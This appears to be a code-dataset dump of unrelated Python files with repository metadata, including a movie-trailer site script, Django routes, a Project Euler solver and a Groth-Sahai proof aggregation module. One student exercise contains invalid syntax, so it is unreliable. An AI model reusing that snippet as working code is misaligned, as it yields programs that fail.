io.imsave(os.path.join(save_path,"%d_predict_label.png"%index), dst)
| [
"betpotti@gmail.com"
] | betpotti@gmail.com |
72009cd6fc5d27df6efcc011b7e639c8b38c1167 | 021fe11ddc9f28b39bbe5a0d23bffff6ff0f734d | /entertainment.py | 0eaa8925b76eb740f1efa873e22ba6f4131db443 | [] | no_license | AnnieLincy/fresh_tomatoes_movie_trailer_website | 6f70f4608ad0efc496b70ecaacf74e477f21d34a | f13bea6858defd7a863239e10f655413945397fe | refs/heads/master | 2021-06-30T17:56:47.844971 | 2017-09-14T04:28:54 | 2017-09-14T04:28:54 | 103,485,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,097 | py |
import fresh_tomatoes
import media
the_boss_baby=media.Movie("THE BOSS BABY","A matured small baby",
"https://upload.wikimedia.org/wikipedia/en/0/0e/The_Boss_Baby_poster.jpg",
"https://www.youtube.com/watch?v=O2Bsw3lrhvs")
bfg = media.Movie("The big friendly giant.",
"An orphan human girl befriends a benevolent giant",
"https://upload.wikimedia.org/wikipedia/en/a/af/The_BFG_poster.jpg",
"https://www.youtube.com/watch?v=VG5MtenlP-A")
#print(bfg.storyline)
#print(the_boss_baby.storyline)
#bfg.show.trailer()
bahubali2 = media.Movie("Bahubali 2",
"Kattappa continues to narrate how he ended up killing Amarendra Baahubali",
"https://upload.wikimedia.org/wikipedia/en/f/f9/Baahubali_the_Conclusion.jpg",
"https://www.youtube.com/watch?v=sOEg_YZQsTI")
ramona_and_beezus = media.Movie("Ramona and Beezus",
"Story of 2 sisters.",
"https://upload.wikimedia.org/wikipedia/en/9/90/Ramona_and_Beezus_Poster.jpg",
"https://www.youtube.com/watch?v=qjW2gNQBajs")
ghazi_attack = media.Movie("The Ghazi attack",
"The film based on the mysterious sinking of PNS Ghazi during Indo-Pakistani War of 1971.",
"https://upload.wikimedia.org/wikipedia/en/e/e7/The_Ghazi_Attack_Poster.jpg",
"https://www.youtube.com/watch?v=Xn2qOnKuOoc")
fast_and_furious = media.Movie("Fast and Furious",
"The Fast and the Furious is an American franchise based on a series of action films",
"https://upload.wikimedia.org/wikipedia/en/5/54/Fast_and_the_furious_poster.jpg",
"https://www.youtube.com/watch?v=ZsJz2TJAPjw")
movies = [the_boss_baby,bfg,bahubali2,ramona_and_beezus,ghazi_attack,fast_and_furious]
fresh_tomatoes.open_movies_page(movies)
| [
"noreply@github.com"
] | AnnieLincy.noreply@github.com |
a82cba3b032d7fae58e9cd2b2e97411d36c3d640 | f72f95cce172b5b06ebd41956510cf53238e29ea | /snippets/urls.py | 89d8a4c20aa7410a628948711d6d4f094f5766d1 | [] | no_license | sritambehera/snippets | d3d9a1f18645206faf4c676ccdb35f927eedcb8a | 295d14c95a9b2126cf3d8625c57565c043cfd9ab | refs/heads/master | 2022-12-11T04:09:16.103825 | 2019-09-20T11:02:55 | 2019-09-23T19:14:05 | 206,324,529 | 0 | 0 | null | 2022-12-08T06:07:16 | 2019-09-04T13:22:09 | Python | UTF-8 | Python | false | false | 1,125 | py | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from snippets import views
router = DefaultRouter()
router.register(r'snippets', views.SnippetViewSet)
router.register(r'users', views.UserViewSet)
urlpatterns = [
path('', include(router.urls)),
]
'''
snippet_list = SnippetViewSet.as_view({'get': 'list', 'post': 'create'})
snippet_detail = SnippetViewSet.as_view({'get': 'retrieve', 'put': 'update','patch':'partial_update', 'delete': 'destroy'})
snippet_highlight = SnippetViewSet.as_view({'get': 'highlight'}, renderer_classes = [renderers.StaticHTMLRenderer])
user_list = UserViewSet.as_view({'get': 'list'})
user_detail = UserViewSet.as_view({'get': 'retrieve'})
urlpatterns = format_suffix_patterns([
path('', api_root),
path('snippets/', snippet_list, name = 'snippet-list'),
path('snippets/<int:pk>/',snippet_detail, name = 'snippet-detail'),
path('users/', user_list , name = 'user-list'),
path('users/<int:pk>',user_detail, name = 'user-detail'),
path('snippets/<int:pk>/highlight/',snippet_highlight, name = 'snippet-highlight'),
])
''' | [
"sritambehera110@gmail.com"
] | sritambehera110@gmail.com |
37e3a4cc222163f516595fe6e5f1b28d7b5ed921 | 41309eae711707844b715a7149dc450c98bea1ce | /clubadmin/shared/dialogs/Image.py | f42aa211a0f5f0bae5afa74b8ff070511ac948a9 | [
"MIT"
] | permissive | rpmoseley/clubadmin | 57f56a8cf1a7de1908a9fd47ca42d03a1c161dac | 35d0094ea5e97e8478ca021ab8e422cebbc26263 | refs/heads/master | 2021-05-12T15:49:16.646847 | 2018-01-12T17:40:46 | 2018-01-12T17:40:46 | 116,993,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | '''
This module provides the customised Image class
'''
import wx
class Image(wx.Image):
'''Provide an overloaded variant of the Image to add the support of labels'''
def __init__(self, *args, **kwds):
label = kwds.pop('label', None)
wx.Image.__init__(self, *args, **kwds)
if label is not None:
self.label = wx.StaticText(label)
| [
"richard.moseley4@gmail.com"
] | richard.moseley4@gmail.com |
faf28195ec1f792c63f3bb9a91057cbee700d198 | 63c0b4d830d79ea11e48915fd192da7c888f5402 | /44.py | 55e53c74c52b589a1093b8bb6ed211087e68c613 | [] | no_license | sejje/sejje-euler | f9127a98f1860ce9c22f35ce2574263fc2ede762 | 2737b5bd93ef017c28c3ff1d2f498ef006302d5e | refs/heads/master | 2016-09-10T18:43:04.577965 | 2012-10-15T17:49:18 | 2012-10-15T17:49:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | import math
def pentagonal(n):
return n * (3 * n - 1) / 2
def is_pentagonal(n):
# if X is a natural number, return True
x = ((math.sqrt(24 * n + 1) + 1) / 6)
return int(x) == x
for i in xrange(1, 9999999):
if is_pentagonal(i):
for x in xrange(1, i):
if is_pentagonal(x):
if is_pentagonal(i - x):
if is_pentagonal(i + x):
print i, x, abs(i - x)
| [
"jesse.briggs@gmail.com"
] | jesse.briggs@gmail.com |
4a60de6be31da7bf31c87e44c1819edbb0b124a0 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_040/ch20_2020_03_05_18_36_09_760355.py | f61391c93f57ceb3a39f6885c928eb85d74c21f9 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | distancia=float(input("Qual distรขncia vocรช deseja percorrer: "))
if (distancia<=200):
print ("R$",(distancia:.2f*0.5))
else:
print ("R$",(200*0.5+(distancia:.2f-200)*0.45)) | [
"you@example.com"
] | you@example.com |
e64f4820312395912aa140973da3066ee6abffb6 | 96a76aee885037023ab37e1e5f0ef076c0740bac | /proofs_aggreg.py | b12d3ae70e9ef66cb82499d67592b0d070f2626f | [
"MIT"
] | permissive | rrtoledo/panic | 361cdbb7823cd5ee6232ee650884c8af9c1bc050 | 1218ca1aa777b28c1a53143694c98a7f728134e1 | refs/heads/master | 2022-11-20T19:50:20.872767 | 2020-07-24T19:11:53 | 2020-07-24T19:11:53 | 282,295,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,988 | py | from bplib.bp import G1Elem
from bplib.bp import G2Elem
from bplib.bp import GTElem
from petlib.bn import Bn
from gsproof import GSProof
from bsps import BSPS
from usps import USPS
from cca2_cs import CSEnc
from hashlib import sha256
def proof_sigi(gsp, X, Y, M):
"""" creates GS proof that a USPS signature verifies
with the verifying key, the signature and the first message secret"""
res = []
A = []
B = []
C = []
counter_i = len(X)-len(M)-2
counter_j = len(Y)-len(M)-2
for i in range(len(X)):
row = []
for j in range(len(Y)):
var = Bn(0)
if i == counter_i and j == counter_j:
var = Bn(1)
counter_i += 1
counter_j += 1
row.append(var)
C.append(row)
success, result = gsp.Prove_aggreg("PPE", X, B, A, Y, C, GTElem.zero(gsp.G))
verify = 0
if success:
eq_type, X, Y, C, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result
#verify = gsp.Verify(eq_type, X, Y, C, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify:
res = [C, [pi2_v1, pi2_w1, pi1_v2, pi1_w2] ]
#print("Do we successfully create a proof?", success)
#print("Does the proof successfully verify?", verify)
b = challenge(result)
for i in range(len(res[0])):
for j in range(len(res[0][0])):
if res[0][i][j] != 0:
res[0][i][j]= b*res[0][i][j]
for i in range(len(res[1])):
for j in range(len(res[1][i])):
res[1][i][j] = b*res[1][i][j]
#verify = gsp.Verify("PPE", X, Y, res[0], res[1][0], res[1][1], res[1][2], res[1][3])
#print("Does the (aggregate) proof verify?", verify)
return res
def proof_sigi0(gsp, X, Y, M1, M2, t):
""" create GS proof that sig verifies with the signature and all but the first message secret """
res = []
#print("----- first equation")
#res1 = e(R,V) * e(S,g2)* e(g1,Z)^-1 * Sum[] e(m1[i],W[i]) ]
res1=[]
B1 = []
A1 = []
C1 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
c = Bn(0)
row.append(c)
C1.append(row)
C1[0][1] = Bn(-1) # e(g1,Z)^-1
C1[2+len(M2)][2] = Bn(1) # e(R,V)
C1[3+len(M2)][0] = Bn(1) # e(S,g2)
C1[0][3] = t # e(g1^t,W0)
C1[1+len(M2)][4] = Bn(1) # e(h_i,W1)
success1, result1 = gsp.Prove_aggreg("PPE", X, B1, A1, Y, C1, GTElem.zero(gsp.G))
verify1 = 0
if success1:
eq_type, X1, Y1, C1, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result1
#verify1 = gsp.Verify(eq_type, X1, Y1, C1, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify1:
res1 = [C1, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res1)
#print("Do we successfully create a first proof?", success1)
#print("Does the first proof successfully verify?", verify1)
#print("----- second equation")
#res2 = e(R,T) * e(g1,g2)^-1 * Sum [e(U[j],m2[j])]
res2=[]
B2 = []
A2 = []
C2 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
c = Bn(0)
row.append(c)
C2.append(row)
C2[0][0] = Bn(-1) # e(g1,g2)^-1
C2[2+len(M2)][5] = Bn(1) # e(R,T)
for i in range(len(M2)):
C2[1+i][len(Y)-len(M2)+i] = Bn(1) # e(U, M2)
success2, result2 = gsp.Prove_aggreg("PPE", X, B2, A2, Y, C2, GTElem.zero(gsp.G))
verify2 = 0
if success2:
eq_type, X2, Y2, C2, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result2
#verify2 = gsp.Verify(eq_type, X2, Y2, C2, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify2:
res2 = [C2, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res2)
#print("Do we successfully create a second proof?", success2)
#print("Does the second proof successfully verify?", verify2)
#print("Are all the proofs successfull created?", success1*success2)
#print("Do all the proofs verify?", verify1*verify2)
b1 = challenge(result1)
b2 = challenge(result2)
C = []
for i in range(len(C1)):
row = []
for j in range(len(C1[0])):
cij = Bn(0)
if C1[i][j] != 0:
cij += b1 * C1[i][j]
if C2[i][j] != 0:
cij += b2 * C2[i][j]
row.append(cij)
C.append(row)
pi = []
for i in range(len(res1[1])):
pi_i = []
for j in range(len(res1[1][0])):
pi_ij = b1*res1[1][i][j] + b2*res2[1][i][j]
pi_i.append(pi_ij)
pi.append(pi_i)
#verify = gsp.Verify("PPE", X, Y, C, pi[0], pi[1], pi[2], pi[3])
#print("Does the (aggregate) proof verify?", verify)
return C, pi, res
def proof_sigit(gsp, X, Y, M1, M2, t):
""" create GS proof that sig verifies with the signature and all but the first message secret """
res = []
#print("----- first equation")
#res1 = e(R,V) * e(S,g2)* e(g1,Z)^-1 * Sum[] e(m1[i],W[i]) ]
res1 = []
B1 = []
A1 = []
C1 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
c = Bn(0)
row.append(c)
C1.append(row)
C1[0][1] = Bn(-1) # e(g1,Z)^-1
C1[4+len(M2)][2] = Bn(1) # e(R,V)
C1[5+len(M2)][0] = Bn(1) # e(S,g2)
C1[0][3] = t # e(g1^t,W0)
C1[1+len(M2)][4] = Bn(1) # e(h_i,W1)
success1, result1 = gsp.Prove_aggreg("PPE", X, B1, A1, Y, C1, GTElem.zero(gsp.G))
verify1 = 0
if success1:
eq_type, X1, Y1, C1, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result1
#verify1 = gsp.Verify(eq_type, X1, Y1, C1, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify1:
res1 = [C1, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res1)
#print("Do we successfully create a first proof?", success1)
#print("Does the first proof successfully verify?", verify1)
#print("----- second equation")
#res2 = e(R,T) * e(g1,g2)^-1 * Sum [e(U[j],m2[j])]
res2 = []
B2 = []
A2 = []
C2 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
c = Bn(0)
row.append(c)
C2.append(row)
C2[0][0] = Bn(-1) # e(g1,g2)^-1
C2[4+len(M2)][6] = Bn(1) # e(R,T)
for i in range(len(M2)):
C2[1+i][len(Y)-len(M2)+i] = Bn(1) # e(U, M2)
success2, result2 = gsp.Prove_aggreg("PPE", X, B2, A2, Y, C2, GTElem.zero(gsp.G))
verify2 = 0
if success2:
eq_type, X2, Y2, C2, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result2
#verify2 = gsp.Verify(eq_type, X2, Y2, C2, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify2:
res2 = [C2, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res2)
#print("Do we successfully create a second proof?", success2)
#print("Does the second proof successfully verify?", verify2)
#print("Are all the proofs successfull created?", success1*success2)
#print("Do all the proofs verify?", verify1*verify2)
b1 = challenge(result1)
b2 = challenge(result2)
C = []
for i in range(len(C1)):
row = []
for j in range(len(C1[0])):
cij = Bn(0)
if C1[i][j] != 0:
cij += b1*C1[i][j]
if C2[i][j] != 0:
cij += b2*C2[i][j]
row.append(cij)
C.append(row)
pi = []
for i in range(len(res1[1])):
pi_i = []
for j in range(len(res1[1][0])):
pi_ij = b1*res1[1][i][j] + b2*res2[1][i][j]
pi_i.append(pi_ij)
pi.append(pi_i)
#verify = gsp.Verify("PPE", X, Y, C, pi[0], pi[1], pi[2], pi[3])
#print("Does the (aggregate) proof verify?", verify)
return C, pi, res
def enc_proof(gsp, X, Y, a):
    """Build Groth-Sahai proofs for the encryption relations and aggregate
    them with Fiat-Shamir challenges.

    Each equation is encoded as a constraint matrix C over the committed
    variables: rows are indexed by X (G1-side commitments) and columns by
    Y (G2-side commitments); the hard-coded indices below pick out the
    specific variables (e, h_i, h*r, u1, u2, v, ...) in the caller's
    x_me1 / y_me1 layout.

    :param gsp: Groth-Sahai proof system (provides Prove_aggreg, group G).
    :param X: G1-side commitment list (constraint-matrix rows).
    :param Y: G2-side commitment list (constraint-matrix columns).
    :param a: scalar for the disabled fourth equation (da = d*a); currently
        unused because that check is performed with a hash instead.
    :return: ``(C, pi, res)`` -- the challenge-weighted aggregate matrix,
        the aggregated proof elements, and the per-equation proofs.

    NOTE(review): the per-element debug print loop near the end looks like
    leftover instrumentation; if any proof fails (``res`` shorter than
    expected) the later aggregation over ``res1``..``res5`` raises.
    """
    res = []
    #print("--- first equation")
    # e = h_i + h*r
    res1 = []
    A1 = []
    B1 = []
    C1 = []
    # Zero-initialise a len(X) x len(Y) matrix of Bn scalars.
    for i in range(len(X)):
        row = []
        for j in range(len(Y)):
            row.append(Bn(0))
        C1.append(row)
    C1[12][0] = Bn(-1) # - e
    C1[7][0] = Bn(1) # + h_i
    C1[4][2] = Bn(1) # + h*r
    success1, result1 = gsp.Prove_aggreg("ME1", X, B1, A1, Y, C1, G1Elem.inf(gsp.G))
    verify1 = 0
    if success1:
        eq_type, X1, Y1, C1, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result1
        #verify1 = gsp.Verify(eq_type, X1, Y1, C1, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
        #if verify1:
        res1 = [C1, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
        res.append(res1)
    #print("Do we successfully create a first proof?", success1)
    #print("Does the first proof successfully verify?", verify1)
    #print("--- second equation")
    #u1 = g1_enc*r
    res2 = []
    B2 = []
    A2 = []
    C2 = []
    for i in range(len(X)):
        row = []
        for j in range(len(Y)):
            row.append(Bn(0))
        C2.append(row)
    C2[0][2] = Bn(-1) # - g1enc*r
    C2[10][0] = Bn(1) # + u1
    success2, result2 = gsp.Prove_aggreg("MC1", X, B2, A2, Y, C2, G1Elem.inf(gsp.G))
    verify2 = 0
    if success2:
        eq_type, X2, Y2, C2, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result2
        #verify2 = gsp.Verify(eq_type, X2, Y2, C2, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
        #if verify2:
        res2 = [C2, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
        res.append(res2)
    #print("Do we successfully create a second proof?", success2)
    #print("Does the second proof successfully verify?", verify2)
    #print("--- third equation")
    #u2 = g2_enc*r
    res3 = []
    B3 = []
    A3 = []
    C3 = []
    for i in range(len(X)):
        row = []
        for j in range(len(Y)):
            row.append(Bn(0))
        C3.append(row)
    C3[1][2] = Bn(-1) # - g2_enc * r
    C3[11][0] = Bn(1) # + u2
    success3, result3 = gsp.Prove_aggreg("ME1", X, B3, A3, Y, C3, G1Elem.inf(gsp.G))
    verify3 = 0
    if success3:
        eq_type, X3, Y3, C3, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result3
        #verify3 = gsp.Verify(eq_type, X3, Y3, C3, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
        #if verify3:
        res3 = [C3, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
        res.append(res3)
    #print("Do we successfully create a third proof?", success3)
    #print("Does the third proof successfully verify?", verify3)
    """ We perform this check with a hash
    #print("--- fourth equation")
    # da = d*a
    res4 = []
    B4 = []
    A4 = []
    C4 = []
    for i in range(len(X)):
        row = []
        for j in range(len(Y)):
            row.append(Bn(0))
        C4.append(row)
    C4[9][0] = Bn(-1) # - da
    C4[3][0] = a # + d*a
    success4, result4 = gsp.Prove_aggreg("ME1", X, B4, A4, Y, C4, G1Elem.inf(gsp.G))
    verify4 = 0
    if success4:
        eq_type, X4, Y4, C4, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result4
        #verify4 = gsp.Verify(eq_type, X4, Y4, C4, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
        #if verify4:
        res4 = [C4, [pi2_v1, pi2_w1, pi1_v2, pi1_w2] ]
        res.append(res4)
    #print("Do we successfully create an fourth proof?", success4)
    #print("Does the fourth proof successfully verify?", verify4)
    """
    #print("--- fifth equation")
    #v = c*r + d*(a*r) = c*r + da*r
    res5 = []
    B5 = []
    A5 = []
    C5 = []
    for i in range(len(X)):
        row = []
        for j in range(len(Y)):
            row.append(Bn(0))
        C5.append(row)
    C5[2][2] = Bn(1) # + c*r
    C5[9][2] = Bn(1) # + da*r
    C5[13][0] = Bn(-1) # - v
    success5, result5 = gsp.Prove_aggreg("MC1", X, B5, A5, Y, C5, G1Elem.inf(gsp.G))
    verify5 = 0
    if success5:
        eq_type, X5, Y5, C5, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result5
        #verify5 = gsp.Verify(eq_type, X5, Y5, C5, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
        #if verify5:
        res5 = [C5, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
        res.append(res5)
    #print("Do we successfully create a fifth proof?", success5)
    #print("Does the fifth proof successfully verify?", verify5)
    #print("Do we successfully create all the proofs?", success1*success2*success3*success4*success5)
    #print("Do all the proofs successfully verify?", verify1*verify2*verify3*verify4*verify5)
    # Fiat-Shamir: derive one challenge scalar per proof transcript, then
    # take the challenge-weighted linear combination of the matrices and
    # proof elements so a single verification covers all equations.
    b1 = challenge(result1)
    b2 = challenge(result2)
    b3 = challenge(result3)
    #b4 = challenge(result4)
    b5 = challenge(result5)
    C = []
    for i in range(len(C1)):
        row = []
        for j in range(len(C1[0])):
            cij = Bn(0)
            if C1[i][j] != 0:
                cij += b1*C1[i][j]
            if C2[i][j] != 0:
                cij += b2*C2[i][j]
            if C3[i][j] != 0:
                cij += b3*C3[i][j]
            #if C4[i][j] != 0:
            #    cij += b4*C4[i][j]
            if C5[i][j] != 0:
                cij += b5*C5[i][j]
            row.append(cij)
        C.append(row)
    pi = []
    for i in range(len(res1[1])):
        pi_i = []
        for j in range(len(res1[1][0])):
            pi_ij = b1*res1[1][i][j] + b2*res2[1][i][j] + b3*res3[1][i][j] + b5*res5[1][i][j] # + b4*res4[1][i][j]
            pi_i.append(pi_ij)
        pi.append(pi_i)
    # NOTE(review): debug dump of every proof element (checks whether each
    # element equals the identity) -- looks like leftover instrumentation.
    print("\n--- enc")
    for i in range(len(res)):
        print("proof #"+str(i))
        for j in range(4):
            for k in range(2):
                if type(res[i][1][j][k]) == G1Elem:
                    print(i,j,k, type(res[i][1][j][k]), res[i][1][j][k].eq(G1Elem.inf(gsp.G)))
                else:
                    print(i,j,k,type(res[i][1][j][k]), res[i][1][j][k].eq(G2Elem.inf(gsp.G)))
    #verify = gsp.Verify("ME1", X, Y, C, pi[0], pi[1], pi[2], pi[3])
    #print("Does the (aggregate) proof verify?", verify)
    return C, pi, res
def proof_pkuv(gsp, X, Y):
    """Prove the exponent relation pk_uv = h_v^sku as a Groth-Sahai
    multi-scalar equation, then blind the proof with a Fiat-Shamir
    challenge.

    :param gsp: Groth-Sahai proof system instance.
    :param X: G1-side commitments (constraint-matrix rows).
    :param Y: G2-side commitments (constraint-matrix columns).
    :return: ``[C, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]`` with both the matrix
        and the proof elements scaled by the challenge.

    NOTE(review): if ``success`` is falsy, ``res`` stays ``[]`` and the
    debug loop below raises IndexError; the per-element prints look like
    leftover instrumentation.
    """
    res = []
    B = []
    A = []
    C = []
    # Zero constraint matrix over the committed variables.
    for i in range(len(X)):
        row = []
        for j in range(len(Y)):
            row.append(Bn(0))
        C.append(row)
    C[6][0] = Bn(1) # pk_uv
    C[5][1] = Bn(-1) # - h_v^sku
    success, result = gsp.Prove_aggreg("MC1", X, B, A, Y, C, G1Elem.inf(gsp.G))
    verify = 0
    if success:
        eq_type, X, Y, C, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result
        #verify = gsp.Verify(eq_type, X, Y, C, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
        #if verify:
        res = [C, [pi2_v1, pi2_w1, pi1_v2, pi1_w2] ]
    #print("Do we successfully create a proof?", success)
    #print("Does the proof successfully verify?", verify)
    print("\n----pk uv")
    for i in range(len(res[1])):
        for j in range(2):
            if type(res[1][i][j]) == G1Elem:
                print(i,j,type(res[1][i][j]), res[1][i][j].eq(G1Elem.inf(gsp.G)))
            else:
                print(i,j,type(res[1][i][j]), res[1][i][j].eq(G2Elem.inf(gsp.G)))
    # Fiat-Shamir challenge: scale matrix entries and proof elements by b
    # so this proof can be summed with the other ME1/MC1 proofs.
    b = challenge(result)
    for i in range(len(res[0])):
        for j in range(len(res[0][0])):
            if res[0][i][j] != 0:
                res[0][i][j]= b*res[0][i][j]
    for i in range(len(res[1])):
        for j in range(len(res[1][i])):
            res[1][i][j] = b*res[1][i][j]
    #verify = gsp.Verify("ME1", X, Y, C, res[1][0], res[1][1], res[1][2], res[1][3])
    #print("Does the (aggregate) proof verify?", verify)
    return res
def proof_pkui(gsp, X, Y):
    """Prove the exponent relation pk_ui = h_i^sku as a Groth-Sahai
    multi-exponent equation, then blind the proof with a Fiat-Shamir
    challenge.

    :param gsp: Groth-Sahai proof system instance.
    :param X: G1-side commitments (constraint-matrix rows).
    :param Y: G2-side commitments (constraint-matrix columns).
    :return: ``[C, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]`` scaled by the
        challenge.

    NOTE(review): unlike proof_pkuv, the challenge loop below multiplies
    *every* matrix entry (no ``!= 0`` guard) -- presumably equivalent since
    b*0 == 0, but worth confirming the two helpers are meant to differ.
    If ``success`` is falsy, ``res`` stays ``[]`` and the debug loop raises.
    """
    res = []
    B = []
    A = []
    C = []
    # Zero constraint matrix over the committed variables.
    for i in range(len(X)):
        row = []
        for j in range(len(Y)):
            row.append(Bn(0))
        C.append(row)
    C[8][0] = Bn(1) # pk_ui
    C[7][1] = Bn(-1) # - h_i^sku
    success, result = gsp.Prove_aggreg("ME1", X, B, A, Y, C, G1Elem.inf(gsp.G))
    verify = 0
    if success:
        eq_type, X, Y, C, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result
        #verify = gsp.Verify(eq_type, X, Y, C, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
        #if verify:
        res = [C, [pi2_v1, pi2_w1, pi1_v2, pi1_w2] ]
    #print("Do we successfully create a proof?", success)
    #print("Does the proof successfully verify?", verify)
    print("\n--- pkui")
    for i in range(len(res[1])):
        for j in range(2):
            if type(res[1][i][j]) == G1Elem:
                print(i,j,type(res[1][i][j]),res[1][i][j].eq(G1Elem.inf(gsp.G)))
            else:
                print(i,j,type(res[1][i][j]),res[1][i][j].eq(G2Elem.inf(gsp.G)))
    # Fiat-Shamir challenge: scale matrix and proof elements by b.
    b = challenge(result)
    for i in range(len(res[0])):
        for j in range(len(res[0][0])):
            res[0][i][j]= b*res[0][i][j]
    for i in range(len(res[1])):
        for j in range(len(res[1][i])):
            res[1][i][j] = b*res[1][i][j]
    #verify = gsp.Verify("ME1", X, Y, res[0], res[1][0], res[1][1], res[1][2], res[1][3])
    #print("Does the (aggregate) proof verify?", verify)
    return res
def challenge(elements):
    """Derive a Fiat-Shamir challenge scalar from a proof transcript.

    Encodes *elements* bijectively -- each item is length-prefixed and the
    items are joined with a delimiter, so distinct transcripts cannot
    produce the same string by concatenation -- then hashes the encoding
    with SHA-256 and maps the digest to a big-number scalar.

    :param elements: sequence of transcript elements; each is serialised
        with ``str()``.
    :return: ``Bn`` scalar derived from the SHA-256 digest.
    """
    # list() accepts any sequence; the original `[len(elements)] + elements`
    # required `elements` to already be a list and raised TypeError for a
    # tuple transcript.
    elem = [len(elements)] + list(elements)
    elem_str = map(str, elem)
    # Length-prefix every item so the '|' join is unambiguous.
    elem_len = map(lambda x: "%s||%s" % (len(x), x), elem_str)
    state = "|".join(elem_len)
    H = sha256()
    H.update(state.encode("utf8"))
    return Bn.from_binary(H.digest())
def prepare_proofs(auth, vkI, pki, pkv, m, sig_t, t, pk_ui, pk_uv, sku, cipher, ek, r):
    """Commit to all witnesses, build the PPE and ME1 aggregate proofs and
    verify both aggregates.

    Phases (matching the commented timing markers below):
      1. Commit: Groth-Sahai commitments for the issuer key vkI, the
         credential pki, the verifier key pkv, the message m, the signature
         sig_t, the user keys and the ciphertext material.
      2. Assemble the x/y commitment vectors for the PPE equations
         (signature relations) and the ME1 equations (encryption and
         exponent relations) -- the fixed positions here must match the
         hard-coded indices used in proof_sigi*/proof_pku*/enc_proof.
      3. Prove each relation, sum the challenge-weighted matrices and proof
         elements, randomize, and verify the two aggregates.

    :return: ``(verify, res)`` where ``verify`` is the product of the two
        verification results and ``res`` packages the proofs with their
        verification inputs.

    NOTE(review): ``cm_r = r`` aliases the caller's list and then mutates
    ``r[0]`` -- confirm the caller does not reuse ``r`` afterwards.
    """
    #print("Prepare aggregated proofs")
    #print("Prepare proof: Commit")
    #import time
    #t_start = time.time()
    U, W, V, Z = vkI
    cm_U= []
    for i in range(len(U)):
        cm_U.append(auth.GS.Commit({"group":1, "type":"pub", "value":U[i]}))
    cm_W = []
    for i in range(len(W)):
        cm_W.append(auth.GS.Commit({"group":2, "type":"pub", "value":W[i]}))
    cm_V = auth.GS.Commit({"group":2, "type":"pub", "value":V})
    cm_Z = auth.GS.Commit({"group":2, "type":"pub", "value":Z})
    cm_vkI = [cm_U, cm_W, cm_V, cm_Z]
    h_i, vk_i, sig0_i = pki
    cm_h_i = auth.GS.Commit({"group":1, "type":"com", "value":h_i})
    cm_vk_i = []
    for i in range(len(vk_i)):
        cm_vk_i.append(auth.GS.Commit({"group":2, "type":"com", "value":vk_i[i]}))
    cm_sig0_i = []
    cm_sig0_i.append(auth.GS.Commit({"group":1, "type":"com", "value":sig0_i[0]}))
    cm_sig0_i.append(auth.GS.Commit({"group":1, "type":"enc", "value":sig0_i[1]}))
    cm_sig0_i.append(auth.GS.Commit({"group":2, "type":"enc", "value":sig0_i[2]}))
    h_v, vk_v, sig0_v = pkv
    cm_h_v = auth.GS.Commit({"group":1, "type":"pub", "value":h_v})
    cm_m = []
    for i in range(len(m)):
        cm_m.append(auth.GS.Commit({"group":1, "type":"pub", "value":m[i]}))
    # Pad the message vector with identity commitments so its length fits
    # the verification-key layout.
    for i in range(len(cm_vk_i) - 1 -2 - len(cm_m)):
        cm_m.append(auth.GS.Commit({"group":1, "type":"pub", "value":G1Elem.inf(auth.GS.G)}))
    sig_i, c_it = sig_t
    cm_sig_i = []
    for i in range(len(sig_i)):
        cm_sig_i.append(auth.GS.Commit({"group":1, "type":"enc", "value":sig_i[i]}))
    _, sigt_i = c_it
    cm_sigt_i = []
    cm_sigt_i.append(auth.GS.Commit({"group":1, "type":"com", "value":sigt_i[0]}))
    cm_sigt_i.append(auth.GS.Commit({"group":1, "type":"enc", "value":sigt_i[1]}))
